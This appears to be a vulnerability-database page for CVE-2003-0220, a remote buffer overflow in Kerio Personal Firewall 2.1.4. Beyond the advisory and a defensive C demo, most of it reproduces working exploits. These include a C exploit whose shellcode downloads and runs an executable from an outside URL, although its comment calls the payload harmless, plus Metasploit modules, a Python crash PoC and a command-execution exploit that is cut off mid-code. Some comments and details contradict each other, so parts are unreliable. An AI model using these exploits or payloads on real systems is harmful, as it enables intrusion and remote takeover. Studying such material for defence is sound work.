CVE-2003-0220
CVSS 7.5
Published: 2003-05-12 00:00:00
Revised: 2016-10-17 22:30:53

[Original text] Buffer overflow in the administrator authentication process for Kerio Personal Firewall (KPF) 2.1.4 and earlier allows remote attackers to execute arbitrary code via a handshake packet.


[CNNVD] Kerio Personal Firewall Authentication Packet Remote Buffer Overflow Vulnerability (CNNVD-200305-031)

        Kerio Personal Firewall (KPF) is a personal firewall product.
        The administrator authentication handling of Kerio Personal Firewall is flawed: a remote attacker can send a forged packet that triggers a buffer overflow and may execute arbitrary code on the system with the firewall's (administrator-level) privileges.
        When an administrator connects to the firewall, a handshake is performed to set up an encrypted session. The 4th packet of that handshake (the 1st is sent by the administrator) carries 4 bytes of data containing the fixed value 0x40 (64), which gives the size of the following packet that carries the administrator key. When the firewall receives that next packet with recv() it performs no bounds check on its buffer, so if an attacker forges a packet declaring an oversized length and sends it to the firewall, the data is read into the memory buffer and overflows it. A carefully constructed payload may execute arbitrary code on the system with administrator privileges. Every public exploit reproduced further down this page uses the same framing: a 4-byte big-endian length (0x149c in most of them), followed by that many bytes with the return address placed 0x1490 bytes into the key data.
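The handshake step described above, as an added example that is not code from Kerio or from any of the exploits reproduced on this page: a minimal model of the 4th handshake packet (4-byte big-endian length, then the key bytes) with the unchecked reader beside a checked one, plus the client-side packet builder used to feed both. The in-memory connection, the 64-byte `key` buffer and the `saved_ret` word placed after it are assumptions for the demonstration; the real stack layout of KPF 2.1.4 is not known from this page (the public exploits put their return address 0x1490 bytes into the key data, far beyond this model's 64 bytes).

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define KEY_LEN 0x40u   /* the handshake fixes the key packet at 0x40 (64) bytes */

/* Constructed stand-in for a connected socket: the bytes the peer sent. */
typedef struct { const uint8_t *data; size_t len; size_t pos; } conn_t;

static size_t conn_recv(conn_t *c, void *out, size_t n)
{
    size_t avail = c->len - c->pos;
    if (n > avail) n = avail;            /* short read, like a real recv() */
    memcpy(out, c->data + c->pos, n);
    c->pos += n;
    return n;
}

/* Assumed frame layout for the demo: the key buffer followed by one word the
 * caller depends on, standing in for the saved return address. Keeping both
 * in one object keeps the overflow below inside defined memory (the demo only
 * ever sends sizeof(frame_t) bytes to the unchecked reader). */
typedef struct { uint8_t key[KEY_LEN]; uint32_t saved_ret; } frame_t;

static uint32_t be32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}

/* Vulnerable pattern (the CVE-2003-0220 bug class): the length comes from the
 * peer and is used as the recv() size for a fixed buffer without comparing it
 * against sizeof f->key. Bytes 64..67 of the body land on saved_ret. */
static int read_key_unchecked(conn_t *c, frame_t *f)
{
    uint8_t hdr[4];
    if (conn_recv(c, hdr, sizeof hdr) != sizeof hdr) return -1;
    uint32_t n = be32(hdr);                         /* attacker controlled */
    return conn_recv(c, f, n) == n ? 0 : -1;        /* bounds check missing */
}

/* Hardened reader: the protocol defines the size, so any other value is a
 * protocol violation and nothing is copied. */
static int read_key_checked(conn_t *c, frame_t *f)
{
    uint8_t hdr[4];
    if (conn_recv(c, hdr, sizeof hdr) != sizeof hdr) return -1;
    uint32_t n = be32(hdr);
    if (n != KEY_LEN) return -1;                    /* rejects 0x149c, 0x90909090, 0, ... */
    return conn_recv(c, f->key, n) == n ? 0 : -1;
}

/* Client side: 4-byte big-endian length, then the body. This is the framing
 * all the public exploits on this page use (struct.pack('!L', 0x149c),
 * htonl(len), the literal bytes 00 00 14 9c). Returns bytes written, 0 if
 * the output buffer is too small. */
static size_t build_key_packet(uint8_t *out, size_t cap, uint32_t declared,
                               const uint8_t *body, size_t body_len)
{
    if (cap < 4 + body_len) return 0;
    out[0] = (uint8_t)(declared >> 24);
    out[1] = (uint8_t)(declared >> 16);
    out[2] = (uint8_t)(declared >> 8);
    out[3] = (uint8_t)declared;
    memcpy(out + 4, body, body_len);
    return 4 + body_len;
}

/* Feed one packet to a reader on a fresh frame; returns what is left in
 * saved_ret (SENTINEL means it survived) and the reader's status in *rc. */
typedef int (*reader_fn)(conn_t *, frame_t *);
#define SENTINEL 0x0BADF00Du

static uint32_t run_reader(reader_fn rd, const uint8_t *pkt, size_t len, int *rc)
{
    frame_t f;
    memset(f.key, 0, sizeof f.key);
    f.saved_ret = SENTINEL;
    conn_t c = { pkt, len, 0 };
    *rc = rd(&c, &f);
    return f.saved_ret;
}

int main(void)
{
    uint8_t good[KEY_LEN], evil[KEY_LEN + 4], pkt[128];
    int rc;
    size_t n;

    memset(good, 'k', sizeof good);                 /* a well-formed 64-byte key */
    memset(evil, 0x90, sizeof evil);                /* oversize body: sled ...   */
    memcpy(evil + KEY_LEN, "AAAA", 4);              /* ... then bytes hitting saved_ret */

    n = build_key_packet(pkt, sizeof pkt, KEY_LEN, good, sizeof good);
    uint32_t v = run_reader(read_key_checked, pkt, n, &rc);
    printf("benign   checked   rc=%d saved_ret=%08x\n", rc, v);

    n = build_key_packet(pkt, sizeof pkt, KEY_LEN + 4, evil, sizeof evil);
    v = run_reader(read_key_unchecked, pkt, n, &rc);
    printf("oversize unchecked rc=%d saved_ret=%08x  (0x41414141 = overwritten)\n", rc, v);
    v = run_reader(read_key_checked, pkt, n, &rc);
    printf("oversize checked   rc=%d saved_ret=%08x  (rejected, untouched)\n", rc, v);
    return 0;
}
```

The checked reader rejects the length before a single byte is copied, which is the fix the advisory implies: the handshake defines the size, so the peer's value is something to validate, not something to recv() against. Treating the field as a signed integer would not help either, since 0x149c is positive; the only sound test is equality with (or at most an upper bound of) the buffer size.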
        

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/a:kerio:personal_firewall_2:2.1.3
cpe:/a:kerio:personal_firewall_2:2.1.4
cpe:/a:kerio:personal_firewall_2:2.1.1
cpe:/a:kerio:personal_firewall_2:2.1.2
cpe:/a:kerio:personal_firewall_2:2.1

- OVAL (technical details for detection)

No matching OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0220
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0220
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200305-031
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=105155734411836&w=2
(UNKNOWN)  BUGTRAQ  20030428 CORE-2003-0305-02: Vulnerabilities in Kerio Personal Firewall
http://www.coresecurity.com/common/showdoc.php?idx=314&idxseccion=10
(VENDOR_ADVISORY)  MISC  http://www.coresecurity.com/common/showdoc.php?idx=314&idxseccion=10
http://www.kb.cert.org/vuls/id/454716
(UNKNOWN)  CERT-VN  VU#454716
http://www.securityfocus.com/bid/7180
(UNKNOWN)  BID  7180

- Vulnerability information

Kerio Personal Firewall Authentication Packet Remote Buffer Overflow Vulnerability
Severity: High    Type: Boundary condition error
Published: 2003-05-12 00:00:00    Updated: 2005-10-20 00:00:00
Remote
        
        

- Advisories and patches

        Temporary workaround:
        If you cannot install a patch or upgrade immediately, CNNVD recommends the following measure to reduce the threat:
        * Disable the Kerio Personal Firewall remote administration interface.
        The Skin of Humanity (s0h) security group provides the following third-party patch:
        Source:

        http://www.s0h.cc/~threat/goodies/PFpatch/sources_PFpatch.zip

        Binary:

        http://www.s0h.cc/~threat/goodies/PFpatch/PFpatch.exe

        Vendor patch:
        Kerio
        -----
        At the time this advisory was written the vendor had not provided a patch or upgrade; users of this software were advised to watch the vendor's home page for the latest version (the OSVDB and BID records further down this page report that version 2.1.5 fixes the issue):

        http://www.kerio.com/

- Vulnerability information (28)

Kerio Personal Firewall 2.1.4 Remote Code Execution Exploit (EDBID:28)
windows remote
2003-05-08 Verified
Port: 0    Author: Burebista
/*
 * Kerio Personal Firewall v2.1.4 remote code execution exploit 
 * Tested on Windows XP with SP1
 * 
 * In order to exploit, for ease of mind, set the firewall to permit all traffic, or allow
 * a connection to port 44334 from your testing unix shell ip.
 * 
 * It is also possible to use UDP instead of TCP
 * 
 * It works out very well, if not, hit a few times with a ret addr of 0x41414141 to make it crash 
 * AT THAT addr. Then use the original one, it will work. The one I used points to a 'call esp'
 * inside the RPCRT4.DLL.
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>

#define PORT 44334 // the port client will be connecting to, default Kerio admin port 
#define retpos 5272	
#define MAXDATASIZE 5277 // max number of bytes we can get, also size of buffer

// global vars

struct sockaddr_in their_addr; // connector's address information 
char buf[MAXDATASIZE];
int numbytes;

unsigned char shellcode[] =
/* 60-byte NOP sled in front of the payload */
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
/* Download-and-execute payload (author unknown, see the note below): resolves
 * GetModuleHandleA / GetProcAddress / LoadLibraryA, loads wininet.dll, fetches
 * the URL at the end with InternetOpenUrlA / InternetReadFile, writes it to
 * nssc.exe and runs it with WinExec, then calls ExitProcess. The API names,
 * the file name and the URL are the \x08-separated strings after the code. */
"\xEB\x30\x5F\xFC\x8B\xF7\x80"
"\x3F\x08\x75\x03\x80\x37\x08\x47\x80\x3F\x01\x75\xF2\x8B\xE6\x33\xD2\xB2\x04\xC1"
"\xE2\x08\x2B\xE2\x8B\xEC\x33\xD2\xB2\x03\xC1\xE2\x08\x2B\xE2\x54\x5A\xB2\x7C\x8B"
"\xE2\xEB\x02\xEB\x57\x89\x75\xFC\x33\xC0\xB4\x40\xC1\xE0\x08\x89\x45\xF8\x8B\x40"
"\x3C\x03\x45\xF8\x8D\x40\x7E\x8B\x40\x02\x03\x45\xF8\x8B\xF8\x8B\x7F\x0C\x03\x7D"
"\xF8\x81\x3F\x4B\x45\x52\x4E\x74\x07\x83\xC0\x14\x8B\xF8\xEB\xEB\x50\x8B\xF8\x33"
"\xC9\x33\xC0\xB1\x10\x8B\x17\x03\x55\xF8\x52\xEB\x03\x57\x8B\xD7\x80\x7A\x03\x80"
"\x74\x16\x8B\x32\x03\x75\xF8\x83\xC6\x02\xEB\x02\xEB\x7E\x8B\x7D\xFC\x51\xF3\xA6"
"\x59\x5F\x74\x06\x40\x83\xC7\x04\xEB\xDB\x5F\x8B\x7F\x10\x03\x7D\xF8\xC1\xE0\x02"
"\x03\xF8\x8B\x07\x8B\x5D\xFC\x8D\x5B\x11\x53\xFF\xD0\x89\x45\xF4\x8B\x40\x3C\x03"
"\x45\xF4\x8B\x70\x78\x03\x75\xF4\x8D\x76\x1C\xAD\x03\x45\xF4\x89\x45\xF0\xAD\x03"
"\x45\xF4\x89\x45\xEC\xAD\x03\x45\xF4\x89\x45\xE8\x8B\x55\xEC\x8B\x75\xFC\x8D\x76"
"\x1E\x33\xDB\x33\xC9\xB1\x0F\x8B\x3A\x03\x7D\xF4\x56\x51\xF3\xA6\x59\x5E\x74\x06"
"\x43\x8D\x52\x04\xEB\xED\xD1\xE3\x8B\x75\xE8\x03\xF3\x33\xC9\x66\x8B\x0E\xEB\x02"
"\xEB\x7D\xC1\xE1\x02\x03\x4D\xF0\x8B\x09\x03\x4D\xF4\x89\x4D\xE4\x8B\x5D\xFC\x8D"
"\x5B\x2D\x33\xC9\xB1\x07\x8D\x7D\xE0\x53\x51\x53\x8B\x55\xF4\x52\x8B\x45\xE4\xFC"
"\xFF\xD0\x59\x5B\xFD\xAB\x8D\x64\x24\xF8\x38\x2B\x74\x03\x43\xEB\xF9\x43\xE2\xE1"
"\x8B\x45\xE0\x53\xFC\xFF\xD0\xFD\xAB\x33\xC9\xB1\x04\x8D\x5B\x0C\xFC\x53\x51\x53"
"\x8B\x55\xC4\x52\x8B\x45\xE4\xFF\xD0\x59\x5B\xFD\xAB\x38\x2B\x74\x03\x43\xEB\xF9"
"\x43\xE2\xE5\xFC\x33\xD2\xB6\x1F\xC1\xE2\x08\x52\x33\xD2\x52\x8B\x45\xD4\xFF\xD0"
"\x89\x45\xB0\x33\xD2\xEB\x02\xEB\x77\x52\x52\x52\x52\x53\x8B\x45\xC0\xFF\xD0\x8D"
"\x5B\x03\x89\x45\xAC\x33\xD2\x52\xB6\x80\xC1\xE2\x10\x52\x33\xD2\x52\x52\x8D\x7B"
"\x09\x57\x50\x8B\x45\xBC\xFF\xD0\x89\x45\xA8\x8D\x55\xA0\x52\x33\xD2\xB6\x1F\xC1"
"\xE2\x08\x52\x8B\x4D\xB0\x51\x50\x8B\x45\xB8\xFF\xD0\x8B\x4D\xA8\x51\x8B\x45\xB4"
"\xFF\xD0\x8B\x4D\xAC\x51\x8B\x45\xB4\xFF\xD0\x33\xD2\x52\x53\x8B\x45\xDC\xFF\xD0"
"\x89\x45\xA4\x8B\x7D\xA0\x57\x8B\x55\xB0\x52\x50\x8B\x45\xD8\xFF\xD0\x8B\x55\xA4"
"\x52\x8B\x45\xD0\xFF\xD0\xEB\x02\xEB\x12\x33\xD2\x90\x52\x53\x8B\x45\xCC\xFF\xD0"
"\x33\xD2\x52\x8B\x45\xC8\xFF\xD0\xE8\xE6\xFD\xFF\xFF\x47\x65\x74\x4D\x6F\x64\x75"
"\x6C\x65\x48\x61\x6E\x64\x6C\x65\x41\x08\x6B\x65\x72\x6E\x65\x6C\x33\x32\x2E\x64"
"\x6C\x6C\x08\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\x08\x4C\x6F"
"\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x08\x5F\x6C\x63\x72\x65\x61\x74\x08\x5F"
"\x6C\x77\x72\x69\x74\x65\x08\x47\x6C\x6F\x62\x61\x6C\x41\x6C\x6C\x6F\x63\x08\x5F"
"\x6C\x63\x6C\x6F\x73\x65\x08\x57\x69\x6E\x45\x78\x65\x63\x08\x45\x78\x69\x74\x50"
"\x72\x6F\x63\x65\x73\x73\x08\x77\x69\x6E\x69\x6E\x65\x74\x2E\x64\x6C\x6C\x08\x49"
"\x6E\x74\x65\x72\x6E\x65\x74\x4F\x70\x65\x6E\x41\x08\x49\x6E\x74\x65\x72\x6E\x65"
"\x74\x4F\x70\x65\x6E\x55\x72\x6C\x41\x08\x49\x6E\x74\x65\x72\x6E\x65\x74\x52\x65"
"\x61\x64\x46\x69\x6C\x65\x08\x49\x6E\x74\x65\x72\x6E\x65\x74\x43\x6C\x6F\x73\x65"
"\x48\x61\x6E\x64\x6C\x65\x08\x4E\x53\x08\x6E\x73\x73\x63\x2E\x65\x78\x65\x08"
"http://reversedhell.net/hackyou.exe"
"\x08\x01"; // download + exec from the net; dunno who wrote this sc

// change the url to whatever, this one pops up an inoffensive message box

// end of global vars

int suck(int sock, int n) // painful function to get past the painful Kerio protocol
{
    int i = 0, j = 0, k, a = 0, b = 0, c = 0, d = 0;

    // drains the firewall's handshake banner (the caller asks for 266 bytes,
    // the same 10 + 256 the Core PoC reads) and hexdumps it to stderr
    while (i < n) {
        if ((numbytes = recv(sock, buf, n, 0)) == -1) {
            perror("recv");
            exit(1);
        }

        if (j) i += (numbytes - 1); // ya i know i know :D
        else   i += numbytes;

        for (k = 0; k < numbytes; k++) {
            if (k % 10 == 0) fprintf(stderr, "\n");
            if (buf[k] == 0) fprintf(stderr, "    0 ");
            else fprintf(stderr, " %4.0d ", buf[k]);
        }

        fprintf(stderr, "    * ");
        j++;
        d = buf[numbytes];      // one past the received data; buf was zeroed by the caller
        c = buf[numbytes - 1];
        b = buf[numbytes - 2];
        a = buf[numbytes - 3];
        // stop once the banner ends in 01 00 01 00
        if ((i > 200) && (a == 0x1) && (b == 0x0) && (c == 0x1) && (d == 0x0)) break;
    }
    fprintf(stderr, "\n");
    return i;
}


int main(int argc, char *argv[])
{
    int sockfd, i, j;
    struct hostent *he;

    if (argc != 2) {
        fprintf(stderr, "usage: %s hostname\n", argv[0]);
        exit(1);
    }

    if ((he = gethostbyname(argv[1])) == NULL) {  // get the host info
        perror("gethostbyname");
        exit(1);
    }

    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) { // prepare a socket for connecting
        perror("socket");
        exit(1);
    }

    their_addr.sin_family = AF_INET;    // host byte order
    their_addr.sin_port = htons(PORT);  // short, network byte order
    their_addr.sin_addr = *((struct in_addr *)he->h_addr);
    memset(&(their_addr.sin_zero), '\0', 8);  // zero the rest of the struct

    if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1) {
        perror("connect");
        exit(1);
    }

    fprintf(stderr, "shell len = %d\n", (int)strlen((char *)shellcode));
    fprintf(stderr, "Connected to firewall.\n");
    memset(buf, 0x0, sizeof(buf));
    fprintf(stderr, "Sucking buffer..\n");
    suck(sockfd, 266);                  // consume the firewall's handshake banner
    fprintf(stderr, "\nBuffer sucked by black hole..\n");
    memset(buf, 0x0, sizeof(buf));
    fprintf(stderr, "-------------------------------------------------\n");
    fprintf(stderr, "                 - BANNER -   \n");
    fprintf(stderr, "-------------------------------------------------\n");
    sleep(1);
    fprintf(stderr, "coded by Burebista (aanton@reversedhell.net)\n");
    fprintf(stderr, "           released on - 5 Apr 2003 -\n");

    sleep(2);
    fprintf(stderr, "-------------------------------------------------\n");
    memset(buf, 0x90, MAXDATASIZE); // set nops all over

    // prepares call up to beginning of buffer 32 bit=5 bytes
    buf[MAXDATASIZE-1] = '\xff'; //
    buf[MAXDATASIZE-2] = '\xff'; // call -1150
    buf[MAXDATASIZE-3] = '\xee'; //
    buf[MAXDATASIZE-4] = '\xab'; //
    buf[MAXDATASIZE-5] = '\xe8'; //

    j = 0;
    // insert the shellcode in buf at 900
    for (i = 900; j < (int)strlen((char *)shellcode); i++) buf[i] = shellcode[j++];

    // prepares the new return address (on XPSP1 it is CALL ESP in RPCRT4.DLL)
    // bytes 5268..5271 of the packet, i.e. offset 0x1490 into the key data:
    // the same slot ThreaT's exploit and the Metasploit module overwrite
    buf[retpos-1] = '\x78';
    buf[retpos-2] = '\x07';
    buf[retpos-3] = '\x06';
    buf[retpos-4] = '\x90';

    // this prepares packet header with negative length
    buf[0] = 0;
    buf[1] = 0;
    buf[2] = 0x14;
    buf[3] = 0xffffff9c; // negative, -100. firewall will prepare
                         // buf of that size. signed integers hit again
    // On the wire these four bytes are 00 00 14 9c: the big-endian length
    // 0x149c (5276), the same value the Core PoC packs with
    // struct.pack('!L', 0x149c) and ThreaT's exploit sends with htonl().
    // The firewall then reads the 5273 bytes that follow as the key data.
    /*
     The 4th byte in the packet is the size of what the firewall will be expecting to receive
     right ahead. If we send a longer buffer than what we told the firewall to expect, it will be
     simply truncated and nothing cool will happen. The problem is Kerio never thought we could
     tell it something that stupid like we are going to send -100 bytes, it is like expecting a
     client to buy -20 books from your library, which is an absurdity. There is no checking to
     make sure the user input is valid. Again, invalid trusted user input. What they should have
     done is either to use the 4th byte inside a modulus, to make sure it is always positive,
     or lamely check if it is negative, and if true, stop processing the inputted data.

     What's so funny?
    */

    if ((send(sockfd, buf, sizeof(buf), 0)) == -1) { // PASARAN!
        perror("send");
        exit(1);
    }
    fprintf(stderr, "..pasaran...\n");
    fprintf(stderr, ":D Done!\n");

    close(sockfd);
    return 0;
}


// milw0rm.com [2003-05-08]
		

- Vulnerability information (1537)

Kerio Personal Firewall <= 2.1.4 Remote Authentication Packet Overflow (EDBID:1537)
windows remote
2006-02-28 Verified
Port: 44334    Author: y0
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::kerio_auth;
use base "Msf::Exploit";
use strict;
use Pex::Text;

my $advanced = { };

my $info =
  {

	'Name'  => 'Kerio Personal Firewall 2 (2.1.4) Remote Authentication Packet Buffer Overflow',
	'Version'  => '$Revision: 1.1 $',
	'Authors' => [ 'y0 [at] w00t-shell.net', ],
	'Arch'  => [ 'x86' ],
	'OS'    => [ 'win32', 'win2000', 'winxp', ],
	'Priv'  => 0,
	'UserOpts'  => {
		'RHOST' => [1, 'ADDR', 'The target address'],
		'RPORT' => [1, 'PORT', 'The target port', 44334],
		'SSL'   => [0, 'BOOL', 'Use SSL'],
	  },
	'AutoOpts' => { 'EXITFUNC' => 'process' },
	'Payload' => {
		'Space'     => 1000,
		'BadChars'  => "\x00",
		'Prepend'   => "\x81\xc4\x54\xf2\xff\xff",
		'Keys'      => ['-ws2ord'],
	  },

	'Description'  => Pex::Text::Freeform(qq{
	This module exploits a stack overflow in Kerio Personal Firewall 
administration authentication process. This module has only been tested 
against Kerio Personal Firewall 2 2.1.4.
}),

	'Refs'  =>  [
		['BID', '7180'],
		['CVE', '2003-0220'],
		['URL', 'http://www1.corest.com/common/showdoc.php?idx=314&idxseccion=10'],
	  ],

	'Targets' => [
		['Windows 2000 Pro SP4 English', 0x7c2ec68b],
		['Windows XP Pro SP0 English',   0x77e3171b],
		['Windows XP Pro SP1 English',   0x77dc5527],
	  ],

	'Keys' => ['firewall'],

	'DisclosureDate' => 'Apr 28 2003',

  };

sub new {
	my $class = shift;
	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
	return($self);
}

sub Exploit
{
	my $self = shift;
	my $target_host = $self->GetVar('RHOST');
	my $target_port = $self->GetVar('RPORT');
	my $target_idx  = $self->GetVar('TARGET');
	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
	my $target = $self->Targets->[$target_idx];

	if (! $self->InitNops(128)) {
		$self->PrintLine("[*] Failed to initialize the nop module.");
		return;
	}

	my $sploit =
	  Pex::Text::AlphaNumText(4268). $shellcode.
	  pack('V', $target->[1]). "\xe9\x0b\xfe\xff\xff";

	$self->PrintLine(sprintf("[*] Trying to exploit target %s 0x%.8x", $target->[0], $target->[1]));

	my $s = Msf::Socket::Tcp->new
	  (
		'PeerAddr'  => $target_host,
		'PeerPort'  => $target_port,
		'LocalPort' => $self->GetVar('CPORT'),
		'SSL'       => $self->GetVar('SSL'),
	  );
	if ($s->IsError) {
		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
		return;
	}

	$s->Send($sploit);
	$self->Handler($s);
	$s->Close();
	return;
}

1;

# milw0rm.com [2006-02-28]
		

- Vulnerability information (16465)

Kerio Firewall 2.1.4 Authentication Packet Overflow (EDBID:16465)
windows remote
2010-06-15 Verified
Port: 0    Author: metasploit
##
# $Id: kerio_auth.rb 9525 2010-06-15 07:18:08Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Kerio Firewall 2.1.4 Authentication Packet Overflow',
			'Description'    => %q{
				This module exploits a stack buffer overflow in Kerio Personal Firewall
				administration authentication process. This module has only been tested
				against Kerio Personal Firewall 2 (2.1.4).
			},
			'Author'         => 'MC',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9525 $',
			'References'     =>
				[
					['CVE', '2003-0220'],
					['OSVDB', '6294'],
					['BID', '7180'],
					['URL', 'http://www1.corest.com/common/showdoc.php?idx=314&idxseccion=10'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 800,
					'BadChars' => "\x00",
					'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x7c2ec68b } ],
					[ 'Windows XP Pro SP0 English',   { 'Ret' => 0x77e3171b } ],
					[ 'Windows XP Pro SP1 English',   { 'Ret' => 0x77dc5527 } ],
				],
			'Privileged'     => true,
			'DisclosureDate' => 'Apr 28 2003',
			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(44334)
			], self.class)
	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")

		sploit =  make_nops(4468) + payload.encoded
		sploit << [target.ret].pack('V') + [0xe8, -850].pack('CV')

		sock.put(sploit)
		sock.get_once(-1, 3)

		handler
		disconnect
	end

end
		

- Vulnerability information (22417)

Kerio Personal Firewall 2.1.x Remote Authentication Packet Buffer Overflow Vulnerability (1) (EDBID:22417)
windows dos
2003-04-28 Verified
Port: 0    Author: Core Security
source: http://www.securityfocus.com/bid/7180/info

A buffer-overflow vulnerability has been discovered in Kerio Personal Firewall. The problem occurs during the administration authentication process. An attacker could exploit this vulnerability by forging a malicious packet containing an excessive data size. The application then reads this data into a static memory buffer without first performing sufficient bounds checking. 

Successful exploits of this vulnerability may allow an attacker to execute arbitrary commands on a target system, with the privileges of the firewall. 

Note that this vulnerability affects Kerio Personal Firewall 2.1.4 and earlier.

import socket
import struct
import sys


def g(host='192.168.66.160', port=44334):
    # Core's original PoC hard-coded the target; the host is now an optional argument.
    fd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        fd.connect((host, port))
        fd.recv(10)                          # consume the firewall's handshake banner
        fd.recv(256)
        fd.send(struct.pack('!L', 0x149c))   # declared length, big-endian: 5276 bytes
        astr = b'A' * 0x149c                 # far beyond the 0x40 the protocol expects
        fd.send(astr)

    except Exception as e:
        print(e)

    fd.close()


if __name__ == '__main__':
    g(*sys.argv[1:2])
		

- Vulnerability information (22418)

Kerio Personal Firewall 2.1.x Remote Authentication Packet Buffer Overflow Vulnerability (2) (EDBID:22418)
windows remote
2003-04-30 Verified
Port: 0    Author: ThreaT
source: http://www.securityfocus.com/bid/7180/info
 

/**************************************************************
 * Personal Firewall Engine remote buffer overflow Exploit
 **************************************************************
 *
 * Original information shared by CORE Security Technologies.
 * ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 * http://www.coresecurity.com/common/showdoc.php?idx=314&idxseccion=10
 * ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 * Released : 30/04/2003
 *
 * Coded By ThreaT.
 * ThreaT@Ifrance.com
 * http://s0h.cc/~threat
 *
 ********************************************************************
 *
 * This exploit take advantage of the vulnerability discovered by
 * CORE Security Technologies for execute a command on remote workstations
 * equiped with the fallowing PSW :
 *
 * - Tiny Personal Firewall 2.0.15
 * - Kerio Personal Firewall 2.1.4
 *
 *********************************************************************
 *
 * Usage : PFExploit.exe <target> <victim_ip> <command to execute>
 *
 * =====================================================================
 * !! compile with : cl.exe /nologo PFExploit.c /link wsock32.lib !!
 * =====================================================================
 */


#include <windows.h>
#include <winsock.h>
#include <stdio.h>
#include <string.h>

#define len 0x1494          /* declared packet length: 5268 bytes */

int main (int argc, char *argv[])
{
	SOCKET sock1;
	SOCKADDR_IN sin;
	int i;
	DWORD byte = htonl(len);    /* 4-byte length header, network byte order */
	char buffer[len], *p;

	/* Walks the PEB loader list to find kernel32.dll, resolves WinExec and
	 * ExitProcess by a 4-byte name fragment ("inEx", "xitP"), runs the
	 * command string appended right after the code, then exits. */
	char shellcode[] =
	"\xEB\x69\x6A\x30\x5B\x64\x8B\x03\x8B\x40\x0C\x8B\x48\x0C\x8B\xC1"
	"\x8B\x70\x30\x80\x3E\x4B\x75\x4A\x8B\x40\x18\x8B\x58\x3C\x03\xD8"
	"\x8B\x5B\x78\x03\xD8\x8B\x73\x1C\x03\xF0\x56\x8B\x73\x24\x03\xF0"
	"\x56\x8B\x53\x20\x03\xD0\x8B\x5B\x18\x4B\x8B\x34\x9A\x03\xF0\x03"
	"\x74\x24\x10\x8B\x36\x39\x74\x24\x0C\x74\x08\x4B\x23\xDB\x75\xEA"
	"\x58\x58\xC3\x5F\x33\xC9\x66\x8B\x0C\x5F\x5F\x8B\x3C\x8F\x8D\x04"
	"\x07\xC3\x8B\x18\x39\x08\x8B\xC3\x75\xA6\xC3\xEB\x22\x6A\x01\x68"
	"\x69\x6E\x45\x78\xE8\x89\xFF\xFF\xFF\x6A\x01\xFF\x74\x24\x0C\xFF"
	"\xD0\x6A\x01\x68\x78\x69\x74\x50\xE8\x75\xFF\xFF\xFF\xFF\xD0\xE8"
	"\xD9\xFF\xFF\xFF";

	WSADATA wsadata;
	WORD wVersionRequested = MAKEWORD (2,0);

	/* version-specific return addresses, written at offset 0x1490 of the packet */
	struct _target {
		char Name[4];
		char *RetAddr;
		char *App;
	} targ[2] = {
		{"TPF" , "\xED\xEA\x2F\x01", "Tiny Personal Firewall 2.0.15"},
		{"KPF" , "\xF8\xEA\x61\x01", "Kerio Personal Firewall 2.1.4"},
	};

	printf ("#############################################################\n"
		"Personal Firewall Engine, Remote buffer overflow Exploit !\n"
		"#############################################################\n"
		"Discovered by CORE Security Technologies & Coded by ThreaT\n-\n"
		"ThreaT@Ifrance.com\n"
		"http://s0h.cc/~threat\n-\n\n");

	if (argc < 4)
	{
		printf ("usage : PFExploit.exe <target> <victim_ip> <command to execute>\n\n"
			"TARGET ARE\n"
			"__________\n\n"
			"TPF : for Tiny Personal Firewall 2.0.15\n"
			"KPF : for Kerio Personal Firewall 2.1.4\n\n");

		ExitProcess (0);
	}

	if (!(p = (char *) LocalAlloc (LPTR, (strlen (shellcode) + strlen (argv[3]) + 3))))
	{
		printf ("error, cannot allocate memory\n");
		ExitProcess (0);
